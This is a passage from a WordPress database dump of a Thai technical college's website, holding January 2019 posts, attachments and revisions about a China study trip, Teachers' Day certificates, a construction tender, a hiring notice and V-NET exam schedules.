'%e0%b8%a3%e0%b8%b0%e0%b8%ab%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92-%e0%b9%99-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-15 15:01:50', '2019-01-15 08:01:50', '', 0, 'http://www.technicrayong.ac.th/?p=5029', 164, 'post', '', 0),
(5030, 3, '2019-01-15 15:01:25', '2019-01-15 08:01:25', '', '50411518_743926745983516_6692624126042963968_n', '', 'inherit', 'closed', 'closed', '', '50411518_743926745983516_6692624126042963968_n', '', '', '2019-01-15 15:01:25', '2019-01-15 08:01:25', '', 5029, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/50411518_743926745983516_6692624126042963968_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(5031, 3, '2019-01-15 15:01:50', '2019-01-15 08:01:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D743927609316763%26id%3D100010985913485&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ระหว่างวันที่ ๒-๙ มกราคม ๒๕๖๒ นายอานุภาพ วาสะสิริ รองผู้อำนวยการฝ่ายวิชาการ และนายทนง ทองมาก หัวหน้าแผนกวิชาช่าไฟฟ้ากำลัง ได้เดินทางไปนิเทศการจัดการเรียนการสอน และรับนักศึกษาที่ได้ไปศึกษา ณ วิทยาลัยการรถไฟความเร็วสูงหูหนาน สาธารณรัฐประชาชนจีน ระหว่างวันที่ ๖ ก.ค.๒๕๖๑ - ๘ ม.ค.๒๕๖๒ กลับไทย พร้อมทั้งนำนักศึกษาเดินทางเข้าพบ ดร.ประชาคม จันทรชิต รองเลขาธิการคณะกรรมการการอาชีวศึกษา เนื่องในโอกาสที่สำเร็จการศึกษา และเดินทางกลับมายังประเทศไทย', '', 'inherit', 'closed', 'closed', '', '5029-revision-v1', '', '', '2019-01-15 15:01:50', '2019-01-15 08:01:50', '', 5029, 'http://www.technicrayong.ac.th/5029-revision-v1/', 0, 'revision', '', 0),
(5032, 1, '2019-01-16 07:26:05', '2019-01-16 00:26:05', '<h1><span style=\"color: #0000ff;\">สามารถดาวน์โหลดได้ ตั้งแต่วันที่ 21 มกราคม 2562 เป็นต้นไป</span></h1>\nผู้ที่เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562\nณ วิทยาลัยเทคนิคระยอง สามารถดาวน์โหลดเกียรติบัตร ได้ตามรายชื่อด้านล่าง\nโดยมีขั้นตอน ดังนี้\n1. ค้นหารายชื่อของท่าน\n2. เมื่อพบรายชื่อแล้ว ให้เปิดดูเกียรติบัตร โดยคลิ๊กที่ ปุ่ม Open\n3. เกียรติบัตร จะเป็นไฟล์ PDF ท่านสามารถ สั่งพิมพ์ได้ทันที หรือจะบันทึกไว้ในเครื่องเพื่อสั่งพิมพ์ภายหลังก็ได้\n4. การสั่งพิมพ์ ให้ระบุรายละเอียดของการพิมพ์ด้วยว่า พิมพ์พอดีกับกระดาษขนาด A4\n5. แนะนำให้พิมพ์กับกระดาษ A4 ชนิดแข็งความหนาตั้งแต่ 150 แกรม ขึ้นไป\n\n[table id=4 /]', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562', '', 'inherit', 'closed', 'closed', '', '4927-autosave-v1', '', '', '2019-01-16 07:26:05', '2019-01-16 00:26:05', '', 4927, 'http://www.technicrayong.ac.th/4927-autosave-v1/', 0, 'revision', '', 0),
(5033, 1, '2019-01-16 07:26:14', '2019-01-16 00:26:14', '<h1><span style=\"color: #0000ff;\">สามารถดาวน์โหลดได้ ตั้งแต่วันที่ 21 มกราคม 2562 เป็นต้นไป</span></h1>\r\nผู้ที่เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562\r\nณ วิทยาลัยเทคนิคระยอง สามารถดาวน์โหลดเกียรติบัตร ได้ตามรายชื่อด้านล่าง\r\nโดยมีขั้นตอน ดังนี้\r\n1. ค้นหารายชื่อของท่าน\r\n2. เมื่อพบรายชื่อแล้ว ให้เปิดดูเกียรติบัตร โดยคลิ๊กที่ ปุ่ม Open\r\n3. เกียรติบัตร จะเป็นไฟล์ PDF ท่านสามารถ สั่งพิมพ์ได้ทันที หรือจะบันทึกไว้ในเครื่องเพื่อสั่งพิมพ์ภายหลังก็ได้\r\n4. การสั่งพิมพ์ ให้ระบุรายละเอียดของการพิมพ์ด้วยว่า พิมพ์พอดีกับกระดาษขนาด A4\r\n5. แนะนำให้พิมพ์กับกระดาษ A4 ชนิดแข็งความหนาตั้งแต่ 150 แกรม ขึ้นไป\r\n\r\n ', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562', '', 'inherit', 'closed', 'closed', '', '4927-revision-v1', '', '', '2019-01-16 07:26:14', '2019-01-16 00:26:14', '', 4927, 'http://www.technicrayong.ac.th/4927-revision-v1/', 0, 'revision', '', 0),
(5034, 3, '2019-01-17 09:22:29', '2019-01-17 02:22:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B7%E0%B9%89%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%95%E0%B9%88%E0%B8%B3%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-%E0%B9%91%E0%B9%99%E0%B9%92%E0%B9%90-%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A1%E0%B8%95%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร จำนวน ๑ หลัง ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81-2', '', '', '2019-01-17 09:22:29', '2019-01-17 02:22:29', '', 0, 'http://www.technicrayong.ac.th/?p=5034', 163, 'post', '', 0),
(5036, 3, '2019-01-17 09:22:01', '2019-01-17 02:22:01', '', 'ประกาศ ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81-2', '', '', '2019-01-17 09:22:01', '2019-01-17 02:22:01', '', 5034, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า-๑๙๒๐-ตารางเมตร.pdf', 0, 'attachment', 'application/pdf', 0),
(5037, 3, '2019-01-17 09:22:29', '2019-01-17 02:22:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B7%E0%B9%89%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%95%E0%B9%88%E0%B8%B3%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-%E0%B9%91%E0%B9%99%E0%B9%92%E0%B9%90-%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A1%E0%B8%95%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร จำนวน ๑ หลัง ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5034-revision-v1', '', '', '2019-01-17 09:22:29', '2019-01-17 02:22:29', '', 5034, 'http://www.technicrayong.ac.th/5034-revision-v1/', 0, 'revision', '', 0),
(5038, 3, '2019-01-17 10:38:32', '2019-01-17 03:38:32', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.744508515925339&type=3\"><img class=\"aligncenter size-full wp-image-5039\" src=\"/wp-content/uploads/2019/01/17-1-2562-10-36-07.png\" alt=\"\" width=\"508\" height=\"706\" /></a>', '\"คุณธรรมนำครูไทย สร้างเด็กไทยหัวใจซื่อตรง\" งานวันครู ครั้งที่ ๖๓ พ.ศ.๒๕๖๒ ครูดี ศิษย์ดี มีพัฒนา ก้าวหน้า สู่เทคโนโลยี วันพุธที่ ๑๖ มกราคม ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง ดำเนินการโดย สำนักงานศึกษาธิการจังหวัดระยอง ร่วมกับ สำนักงานอาชีวศึกษาจังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%99%e0%b8%b3%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b9%84%e0%b8%97%e0%b8%a2-%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b9%80', '', '', '2019-01-17 10:38:32', '2019-01-17 03:38:32', '', 0, 'http://www.technicrayong.ac.th/?p=5038', 162, 'post', '', 0),
(5039, 3, '2019-01-17 10:36:49', '2019-01-17 03:36:49', '', '17-1-2562 10-36-07', '', 'inherit', 'closed', 'closed', '', '17-1-2562-10-36-07', '', '', '2019-01-17 10:36:49', '2019-01-17 03:36:49', '', 5038, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/17-1-2562-10-36-07.png', 0, 'attachment', 'image/png', 0),
(5040, 3, '2019-01-17 10:38:15', '2019-01-17 03:38:15', '', '49897473_744512145924976_4683805344030261248_o', '', 'inherit', 'closed', 'closed', '', '49897473_744512145924976_4683805344030261248_o', '', '', '2019-01-17 10:38:15', '2019-01-17 03:38:15', '', 5038, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49897473_744512145924976_4683805344030261248_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5041, 3, '2019-01-17 10:38:32', '2019-01-17 03:38:32', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.744508515925339&type=3\"><img class=\"aligncenter size-full wp-image-5039\" src=\"/wp-content/uploads/2019/01/17-1-2562-10-36-07.png\" alt=\"\" width=\"508\" height=\"706\" /></a>', '\"คุณธรรมนำครูไทย สร้างเด็กไทยหัวใจซื่อตรง\" งานวันครู ครั้งที่ ๖๓ พ.ศ.๒๕๖๒ ครูดี ศิษย์ดี มีพัฒนา ก้าวหน้า สู่เทคโนโลยี วันพุธที่ ๑๖ มกราคม ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง ดำเนินการโดย สำนักงานศึกษาธิการจังหวัดระยอง ร่วมกับ สำนักงานอาชีวศึกษาจังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '5038-revision-v1', '', '', '2019-01-17 10:38:32', '2019-01-17 03:38:32', '', 5038, 'http://www.technicrayong.ac.th/5038-revision-v1/', 0, 'revision', '', 0),
(5042, 3, '2019-01-17 16:22:23', '2019-01-17 09:22:23', '', '17-1-2562 16-17-39', '', 'inherit', 'closed', 'closed', '', '17-1-2562-16-17-39', '', '', '2019-01-17 16:22:23', '2019-01-17 09:22:23', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/17-1-2562-16-17-39.png', 0, 'attachment', 'image/png', 0),
(5043, 3, '2019-01-17 16:23:22', '2019-01-17 09:23:22', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\"><img class=\"aligncenter size-full wp-image-5002\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\"><img class=\"aligncenter wp-image-5003\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\" alt=\"\" width=\"398\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-5042 size-full\" src=\"/wp-content/uploads/2019/01/17-1-2562-16-17-39.png\" alt=\"\" width=\"1819\" height=\"654\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2019-01-17 16:23:22', '2019-01-17 09:23:22', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(5046, 3, '2019-01-18 23:48:02', '2019-01-18 16:48:02', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F201901181800.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อบุคคลผู้ผ่านการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ตำแหน่งครูอัตราจ้าง จำนวน ๒ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89-2', '', '', '2019-01-18 23:48:02', '2019-01-18 16:48:02', '', 0, 'http://www.technicrayong.ac.th/?p=5046', 161, 'post', '', 0),
(5047, 3, '2019-01-18 23:47:39', '2019-01-18 16:47:39', '', '201901181800', '', 'inherit', 'closed', 'closed', '', '201901181800', '', '', '2019-01-18 23:47:39', '2019-01-18 16:47:39', '', 5046, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/201901181800.pdf', 0, 'attachment', 'application/pdf', 0),
(5048, 3, '2019-01-18 23:48:02', '2019-01-18 16:48:02', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F201901181800.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อบุคคลผู้ผ่านการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ตำแหน่งครูอัตราจ้าง จำนวน ๒ อัตรา', '', 'inherit', 'closed', 'closed', '', '5046-revision-v1', '', '', '2019-01-18 23:48:02', '2019-01-18 16:48:02', '', 5046, 'http://www.technicrayong.ac.th/5046-revision-v1/', 0, 'revision', '', 0),
(5049, 1, '2019-01-19 10:00:18', '2019-01-19 03:00:18', '<h3><a href=\"/wp-content/uploads/2019/01/V-NET-PVC3-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวช. 3 (คลิ๊กเพื่อเปิดดู)</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2019/01/V-NET-PVS2-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวส. 2 (คลิ๊กเพื่อเปิดดู)</a></h3>\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\"><img class=\"alignnone wp-image-5055\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\"><img class=\"alignnone wp-image-5053\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5052\" src=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"479\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5054\" src=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"423\" /></a>', 'ประกาศรายชื่อผู้เข้าสอบ V-NET ระดับ ปวช. 3 และ ปวส. 2 ปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', 'v-net-2561', '', '', '2019-01-19 10:04:15', '2019-01-19 03:04:15', '', 0, 'http://www.technicrayong.ac.th/?p=5049', 160, 'post', '', 0),
(5050, 1, '2019-01-19 09:50:23', '2019-01-19 02:50:23', '', 'V-NET-PVS2-2561', '', 'inherit', 'closed', 'closed', '', 'v-net-pvs2-2561', '', '', '2019-01-19 09:50:23', '2019-01-19 02:50:23', '', 5049, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/V-NET-PVS2-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(5051, 1, '2019-01-19 09:50:43', '2019-01-19 02:50:43', '', 'V-NET-PVC3-2561', '', 'inherit', 'closed', 'closed', '', 'v-net-pvc3-2561', '', '', '2019-01-19 09:50:43', '2019-01-19 02:50:43', '', 5049, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/V-NET-PVC3-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(5052, 1, '2019-01-19 09:55:04', '2019-01-19 02:55:04', '', 'อุปกรณ์เข้าห้องสอบ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b8%e0%b8%9b%e0%b8%81%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%9a', '', '', '2019-01-19 09:55:04', '2019-01-19 02:55:04', '', 5049, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg', 0, 'attachment', 'image/jpeg', 0),
(5053, 1, '2019-01-19 09:55:10', '2019-01-19 02:55:10', '', 'ตารางสอบ-ปวส2', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%9a-%e0%b8%9b%e0%b8%a7%e0%b8%aa2', '', '', '2019-01-19 09:55:10', '2019-01-19 02:55:10', '', 5049, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg', 0, 'attachment', 'image/jpeg', 0),
(5054, 1, '2019-01-19 09:55:17', '2019-01-19 02:55:17', '', 'ระเบียบเข้าห้องสอบ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%9a%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%9a', '', '', '2019-01-19 09:55:17', '2019-01-19 02:55:17', '', 5049, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg', 0, 'attachment', 'image/jpeg', 0),
(5055, 1, '2019-01-19 09:55:20', '2019-01-19 02:55:20', '', 'ตารางสอบ-ปวช3', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%9a-%e0%b8%9b%e0%b8%a7%e0%b8%8a3', '', '', '2019-01-19 09:55:20', '2019-01-19 02:55:20', '', 5049, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg', 0, 'attachment', 'image/jpeg', 0),
(5056, 1, '2019-01-19 10:00:18', '2019-01-19 03:00:18', '<h3><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2019/01/V-NET-PVC3-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวช. 3</a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2019/01/V-NET-PVS2-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวส. 2</a></h3>\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\"><img class=\"alignnone wp-image-5055\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\"><img class=\"alignnone wp-image-5053\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5052\" src=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"479\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5054\" src=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"423\" /></a>', 'ประกาศรายชื่อผู้เข้าสอบ V-NET ระดับ ปวช. 3 และ ปวส. 2 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '5049-revision-v1', '', '', '2019-01-19 10:00:18', '2019-01-19 03:00:18', '', 5049, 'http://www.technicrayong.ac.th/5049-revision-v1/', 0, 'revision', '', 0),
(5057, 1, '2019-01-19 10:01:41', '2019-01-19 03:01:41', '<h3><a href=\"/wp-content/uploads/2019/01/V-NET-PVC3-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวช. 3 (คลิ๊กเพื่อเปิดดู)</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2019/01/V-NET-PVS2-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวส. 2 (คลิ๊กเพื่อเปิดดู)</a></h3>\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\"><img class=\"alignnone wp-image-5055\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\"><img class=\"alignnone wp-image-5053\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5052\" src=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"479\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5054\" src=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"423\" /></a>', 'ประกาศรายชื่อผู้เข้าสอบ V-NET ระดับ ปวช. 3 และ ปวส. 2 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '5049-revision-v1', '', '', '2019-01-19 10:01:41', '2019-01-19 03:01:41', '', 5049, 'http://www.technicrayong.ac.th/5049-revision-v1/', 0, 'revision', '', 0),
(5058, 1, '2019-01-19 10:04:29', '2019-01-19 03:04:29', '<h3><a href=\"/wp-content/uploads/2019/01/V-NET-PVC3-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวช. 3 (คลิ๊กเพื่อเปิดดู)</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2019/01/V-NET-PVS2-2561.pdf\" target=\"_blank\" rel=\"noopener\">รายชื่อผู้เข้าสอบ และห้องสอบ ระดับ ปวส. 2 (คลิ๊กเพื่อเปิดดู)</a></h3>\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\"><img class=\"alignnone wp-image-5055\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวช3.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\"><img class=\"alignnone wp-image-5053\" src=\"/wp-content/uploads/2019/01/ตารางสอบ-ปวส2.jpg\" alt=\"\" width=\"600\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5052\" src=\"/wp-content/uploads/2019/01/อุปกรณ์เข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"479\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\"><img class=\"alignnone wp-image-5054\" src=\"/wp-content/uploads/2019/01/ระเบียบเข้าห้องสอบ.jpg\" alt=\"\" width=\"600\" height=\"423\" /></a>', 'ประกาศรายชื่อผู้เข้าสอบ V-NET ระดับ ปวช. 3 และ ปวส. 2 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '5049-autosave-v1', '', '', '2019-01-19 10:04:29', '2019-01-19 03:04:29', '', 5049, 'http://www.technicrayong.ac.th/5049-autosave-v1/', 0, 'revision', '', 0),
